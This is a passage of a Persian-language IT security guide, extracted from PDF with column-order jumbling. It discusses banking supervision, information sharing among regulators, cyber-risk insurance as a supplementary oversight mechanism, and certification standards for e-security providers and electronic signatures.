‫ﺩﺍﺧﻠــﻲ‪ ،‬ﺟﺎﻣﻌﻴــﺖ ﺍﻣﻨﻴــﺖ ﺳــﺮﻣﺎﻳﻪﻫــﺎ ﻭ ﻫﻤﭽﻨــﻴﻦ ﺟﺎﻣﻌﻴــﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻋـﻼﻡ ﻣـﻲﻛـﺮﺩ‪ .‬ﺣـﻮﺯﻩﻫـﺎﻱ‬
‫ﻧﻈﺎﺭﺕ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺭ ﭼﻨﺪ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺗﻐﻴﻴﺮ ﺟﻬﺖ ﻋﻤﺪﻩﺍﻱ ﭘﻴـﺪﺍ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺻﻨﻌﺖ ﺍﻣﻨﻴﺖ ﺑﺎ ﻣﻌﺮﻓﻲ ﻭ ﺗﻜﻴﻪ ﺑﺮ ﺍﻧﺒـﻮﻩ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺗﻐﻴﻴﺮ ﺍﻟﮕﻮ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻛـﺮﺩ‪،‬‬
‫ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻧﻈـﺎﺭﺕ ﺑـﺎﻧﻜﻲ ﻧﻴـﺰ ﺗﻐﻴﻴـﺮ ﻣﺮﻛـﺰ ﺛﻘـﻞ ﺻـﻨﻌﺖ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺗﺠﺮﺑﻪ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ‪.‬‬
‫ﻫﻤﺎﻫﻨﮕﻲ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺭﻭﻥﻣﺮﺯﻱ ﻭ ﺑﺮﻭﻥﻣﺮﺯﻱ‬
‫ﻳﻚ ﻣﻮﺿﻮﻉ ﻛﻠﻴﺪﻱ ﻛﻪ ﺍﻛﺜﺮ ﻛﺸﻮﺭﻫﺎ ﺑﺎ ﺁﻥ ﺭﻭﺑﺮﻭ ﻫﺴﺘﻨﺪ ﻧﻴـﺎﺯ‬
‫ﺑﻪ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﻭ ﺩﻭﺍﻳـﺮ‬
‫ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ )ﻧﻴﺮﻭﻫـﺎﻱ ﺍﻧﺘﻈـﺎﻣﻲ( ﺍﺳـﺖ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ‬
‫‪۴۰‬‬
‫ﻱ ﺧـﻮﺩ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ‪ ،‬ﺻﻨﻌﺖ ﺑﻴﻤـﻪ ﺑـﻪ ﺧـﻮﺩ ﹺ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺳﺎﺧﺘﺎﺭ ﻣﺠﺪﺩ ﺑﻴﺎﺑﺪ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟـﺖ‬
‫ﺍﺳﺘﻮﺍﺭ ﺑﺮﺳﺪ؛ ﺍﻣﺎ ﺩﺭ ﻫﺮ ﺣﺎﻝ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺍﻳـﻦ ﺷـﺮﺍﻳﻂ ﻧﻴـﺰ ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﻛﺮﺩ‪.‬‬
‫‪Banking‬‬
‫‪Electronic‬‬
‫‪Supervision’s‬‬
‫‪Banking‬‬
‫‪Group‬‬
‫‪41‬‬
‫‪١٣٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﭼﻨﺪﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻬـﻢ ﺩﺍﺭﻧـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﻻ ﺍﻃﻼﻋــﺎﺕ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺑــﺎ ﻳﻜــﺪﻳﮕﺮ ﻳــﺎ ﺑــﺎ‬
‫ﻣﻌﻤــﻮ ﹰ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺮﻭﻥﻣﺮﺯﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪ ﻧﻤـﻲﺷـﻮﻧﺪ )ﮔـﺎﻫﻲ‬
‫ﺍﻭﻗﺎﺕ ﺑﻪ ﺩﻻﻳﻞ ﺣﻘﻮﻗﻲ(‪ .‬ﻣﻮﺿﻮﻉ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺳـﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺩﺭ ﺍﺑﻌﺎﺩ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻓﺮﺍﺗﺮ ﺍﺯ ﺩﺍﻣﻨﺔ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ‪ .‬ﺩﺭ ﻫﺮ‬
‫ﺻﻮﺭﺕ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺩﻭﻟﺘﻬـﺎ ﺳـﻌﻲ ﺩﺍﺭﻧـﺪ ﺑـﺎ ﺟـﺮﺍﺋﻢ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫ﻣﺤﻴﻂ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺎﺑﻠﻪ ﺑﺮﺧﻴﺰﻧﺪ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﻴـﺰ‬
‫ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﺩﺭ ﺍﻳـﻦ ﺑﺤـﺚ ﻣﻮﺿـﻮﻋﺎﺗﻲ ﻛﻠﻴـﺪﻱ ﺑـﻪ‬
‫ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ‪.‬‬
‫ﺭﻛﻦ ﭼﻬﺎﺭﻡ‪:‬‬
‫ﻧﻘﺶ ﺑﻴﻤﺔ ﺧﺼﻮﺻﻲ ﺑﻪ ﻋﻨﻮﺍﻥ‬
‫ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﺗﻜﻤﻴﻠﻲ‬
‫ﻫﺮﭼﻨﺪ ﺑﻴﻤﺔ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﻨﻮﺯ ﺩﺭ ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴـﺔ ﺗﻮﺳـﻌﻪ ﺍﺳـﺖ‪ ،‬ﺍﻣـﺎ ﺣـﺎﻭﻱ‬
‫ﻣﺸﻜﻼﺗﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺷﺨﺺ ﺍﻭﻝ ﻭ ﺷﺨﺺ ﺛﺎﻟﺚ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺗﺨﻤﻴﻦ ﻫﺰﻳﻨﺔ ﻣﺨﺎﻃﺮﺍﺕ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺗﻮﺳﻌﺔ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﻨـﺪ‪،‬‬
‫ﻭﻟﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ‪ ،‬ﺻﻨﻌﺖ ﺑﻴﻤﻪ ﺑﺎﻳـﺪ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺩﺭﺑﺎﺭﺓ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻧﻬﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻲ ﺍﻳﻦ ﻧﻮﻉ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﺩﺭ ﺗﺠﺎﺭﺏ ﺛﺒﺖﺷﺪﺓ ﻛﻨﻮﻧ ﹺ‬
‫ﺑﻴﻤﻪ‪ ،‬ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳـﺪﻱ ﻛـﻪ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺑـﺮﺍﻱ‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩﺍﻧﺪ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﻧـﺸﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﺭﺍﺋـﻪ‪-‬‬
‫ﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﻴﻤﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻟﺰﺍﻡ ﻛﻨﻨﺪ ﻛـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﻓﻨﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺷﻨﺎﺳـﺎﻳﻲ ﺷـﻮﻧﺪ ﻭ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ؛ ﺗﺎ ﭘﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﻣﺠﺒﻮﺭ ﺑـﻪ ﺗﺒﻌﻴـﺖ ﺍﺯ‬
‫ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺟﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻴـﺮﻭﻱ ﻣﻬـﻢ ﺑـﺮﺍﻱ‬
‫ﺗﻐﻴﻴﺮ ﺍﻟﺰﺍﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧـﺪ‬
‫ﻣﻮﺟﺐ ﺑﻬﺒﻮﺩ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺣـﺪﺍﻗﻠﻲ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ‬
‫ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺻﻨﻌﺖ ﺟﻬﺎﻧﻲ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻻﻳﻪﺑﻨﺪﻱﺷﺪﻩ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺸﻨﻴﺎﺯ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺗﺤﺮﻳﻚ ﻛﻨـﺪ‪.‬‬
‫ﺛﺎﻧﻴﹰﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﺑﺨﻮﺍﻫﻨﺪ ﻛﻪ ﺑﻪ ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻣﺮﺍﺟﻌـﻪ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺍﺋـﻪ‬
‫ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﺄﻳﻴﺪﺷـﺪﻩ ﻭ ﻗﺎﺑـﻞ‬
‫ﻗﺒﻮﻝ ﺻﻨﻌﺘﻲ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ ﺗﺎ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ ﺭﺍ ﻛـﺎﻫﺶ‬
‫ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ‪ .‬ﺛﺎﻟﺜـﹰﺎ ﺷـﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﺭﺍ‬
‫ﺗﺮﻏﻴﺐ ﻛﻨﻨﺪ ﺗﺎ ﻣﺆﺳﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ‬
‫ﻛﻴﻔﻴﺖ ﺍﻃﻼﻋـﺎﺕ ﻭ ﮔﺰﺍﺭﺷـﻬﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺭﺧـﺪﺍﺩﻫﺎ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ‬
‫ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﺑﺘـﻮﺍﻥ ﺗﺤﻠﻴـﻞ ﺑﻬﺘـﺮﻱ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺑﺎﺯﮔـﺸﺖ ﺳـﺮﻣﺎﻳﻪ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ‪.‬‬
‫ﺳﺮﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﻪ ﺻﻨﻌﺖ ﺑﻴﻤﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻩﺣﻠﻬﺎﻳﻲ ﻣﻨﺘﺸﺮ ﻛﻨﺪ ﻛﻪ‬
‫ﺩﺭ ﺁﻧﻬﺎ ﻣﺴﺎﺋﻠﻲ ﭼﻮﻥ ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﻣﺴﺌﻮﻟﻴﺖ‪-‬‬
‫ﭘﺬﻳﺮﻱ ﺩﺭ ﻗﺒﺎﻝ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻴـﺎﻥ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺳﺎﻳﺮ ﺷﺮﻛﺘﻬﺎﻱ ﻓﻌﺎﻝ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ )ﻣﺜـﻞ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ( ﺍﻟﺰﺍﻣﻲ ﺷﻮﺩ‪.‬‬
‫ﺭﻛﻦ ﭘﻨﺠﻢ‪:‬‬
‫ﮔﻮﺍﻫﻲ‪ ،٤٢‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﻭ‬
‫ﻧﻘﺶ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ‬
‫ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﺎ ﻫﻤﻜﺎﺭﻱ ﻳﻜﺪﻳﮕﺮ ﺑـﺮﺍﻱ‬
‫ﺗﺪﻭﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ ﻃﺮﺣﻬﺎﻱ ﺗﺄﻳﻴﺪ ﻭ ﺍﻋﻄﺎﻱ‬
‫ﮔﻮﺍﻫﻲ ﺍﻗـﺪﺍﻡ ﻛﻨﻨـﺪ‪ .‬ﺩﻭ ﻋﻨـﻮﺍﻥ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻋﻨﺎﺻﺮ ﻫﺮ ﺗﺮﺍﻛﻨﺶ‪.‬‬
‫ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻣﻮﺭ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛﻪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ‪ ،‬ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ‬
‫ﺑﺮ ﺳﻴﺴﺘﻢ ﭘﺮﺩﺍﺧﺖ ﺗﺄﺛﻴﺮ ﺩﺍﺭﻧﺪ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﻛﺴﺐ ﻣﺠﻮﺯ ﻧﻤﺎﻳﻨـﺪ‪.‬‬
‫ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻟﺰﺍﻡ ﺻـﻨﻌﺖ ﺑـﻪ ﺗﺄﻳﻴـﺪ ﻭ ﺍﻋﻄـﺎﻱ‬
‫‪Certification‬‬
‫‪42‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩ ﺑﺮ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻫﻨﻮﺯ ﺩﺭﺣـﺎﻝ ﺗـﺪﻭﻳﻦ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻪ ﻋﻠﺖ ﻣﺸﻜﻼﺕ ﺫﺍﺗـﻲ ﻛـﻪ ﺩﺭ‬
‫ﻣﺴﺌﻠﻪ ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﻣﺒﺘﻨﻲ ﺑـﺮ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﻲ ﻣﺘﻐﻴﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻳﺎﻓﺘﻦ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺗﻜﻤﻴﻠﻲ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ‬
‫ﻓﻨ ﹺ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ‪ .‬ﻋﻠﻴـﺮﻏﻢ ﻧﻘـﺎﻳﺺ‬
‫ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻃﻼﻋـﺎﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺗﺨﻤـﻴﻦ ﺁﺳـﻴﺒﻬﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻣﺪﺗﻲ ﺍﺳﺖ ﻛﻪ ﺻـﻨﻌﺖ ﺑﻴﻤـﻪ ﺩﺭ ﺍﻳـﻦ‬
‫ﻗﺴﻤﺖ ﻧﻘﺶ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ‪ .‬ﭘﻴﺶﺑﻴﻨـﻲ ﻣـﻲﺷـﻮﺩ ﺩﺭ ﭼﻨـﺪ ﺳـﺎﻝ‬
‫ﺁﻳﻨﺪﻩ ﺗﻨﻬﺎ ﺩﺭ ﺑﺎﺯﺍﺭ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ‪ ،‬ﺭﺷـﺪ ﺑﻴﻤـﺔ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﮔـﺴﺘﺮﺓ ﻣﺨـﺎﻃﺮﺍﺕ ﺁﻥ ﺳـﺎﻻﻧﻪ ﺑـﻪ ‪۲،۵‬‬
‫ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺑﺮﺳﺪ‪.‬‬
‫ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺨــﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺷــﻮﻧﺪ‪ ،‬ﺍﻳــﻦ ﺩﺳــﺘﻪ ﺍﺯ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪١٣٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﮔﻮﺍﻫﻲ ﺑﻪ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﺎﺷـﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﺧﻴﺮﹰﺍ ﺩﺭ ﺻﻨﻌﺖ ﺍﻣﻨﻴﺖ ﻳﻚ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ‬
‫"ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺖ" ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺣﻘﻴﻘـﺖ ﺩﺭ ﺍﺛـﺮ ﺍﻳـﻦ‬
‫ﺍﺗﻔﺎﻕ‪ ،‬ﺑﺎ ﺗﻬﻴﺔ ﻳﻚ ﺳﺎﺧﺘﺎﺭ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮﺍﻱ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ‪،‬‬
‫ﻣﺴﺆﻟﻴﺖﭘﺬﻳﺮﻱ ﻣﻴـﺎﻥ ﺻـﻨﻌﺖ ﻭ ﻣﺘﺨﺼـﺼﻴﻦ ﺁﻥ‪ ،‬ﻭ ﺗﻔﻜﻴـﻚ‬
‫ﻦ ﺗﺄﻳﻴﺪﺷﺪﻩ ﺍﺯ ﻛﺴﺎﻧﻴﻜﻪ ﺧﻮﺩ ﺭﺍ ﻣﺘﺨﺼﺺ ﻣﻲﺩﺍﻧﻨـﺪ‪،‬‬
‫ﻣﺘﺨﺼﺼﻴ ﹺ‬
‫ﺍﻳﻦ ﺗﻤﺎﻡ ﺻﻨﻌﺖ ﺍﺳﺖ ﻛﻪ ﺳﻮﺩ ﻣﻲﺑـﺮﺩ‪ .‬ﺍﻳـﻦ ﺭﻭﺵ ﻫﻤﭽﻨـﻴﻦ‬
‫ﻭﺿﻌﻴﺖ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻪ ﻭﺿﻌﻴﺖ ﻳﻚ ﺣـﻮﺯﺓ ﺣﺮﻓـﻪﺍﻱ ﺍﺭﺗﻘـﺎ‬
‫ﻣﻲﺩﻫﺪ ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺻﻨﻌﺖ ﺍﻧﮕﻴـﺰﺓ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺗـﺪﻭﻳﻦ ﻭ‬
‫ﺍﻋﻤﺎﻝ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺣﻮﺯﺓ ﺑﻌﺪﻱ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﻣﻼﺣﻈـﻪ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﮔـﻮﺍﻫﻲﻫـﺎﻱ‬
‫ﻋﻨﺎﺻﺮ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻠﻪ ﻧﻈﻴﺮ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳـﺖ‪ .‬ﮔـﻮﺍﻫﻲ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺭﺯﺵ ﻳﻚ ﻣﻌﺎﻣﻠﻪ ﺭﺍ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﻛـﺴﻲ ﻭ ﭼـﻪ‬
‫ﭼﻴﺰﻱ ﺁﻧﺮﺍ ﮔﻮﺍﻫﻲ ﻛﺮﺩﻩ ﺍﻓﺰﺍﻳﺶ ﺩﻫـﺪ‪ .‬ﮔـﻮﺍﻫﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺩﻭﻟﺘﻲ ﻧﻈﻴﺮ ﺍﺩﺍﺭﺓ ﭘﺴﺖ ﻳـﺎ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺧﺼﻮﺻﻲ ﻣﺜﻞ ﺑﺎﻧﻚ ﺻﺎﺩﺭ ﺷﻮﺩ‪ .‬ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪ ،‬ﻣـﺴﺎﺋﻞ‬
‫ﺳــﺎﺧﺘﺎﺭﻱ ﻭ ﻣــﺪﻳﺮﻳﺘﻲ ﺧــﺎﺹ ﺧــﻮﺩ ﺭﺍ ﺩﺍﺭﻧــﺪ‪ .‬ﺩﺭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻛــﺸﻮﺭﻫﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺮﻛﺘﻬﺎﻱ ﺧــﺼﻮﺻﻲ ﺑــﺮﺍﻱ ﺗﻬﻴــﺔ‬
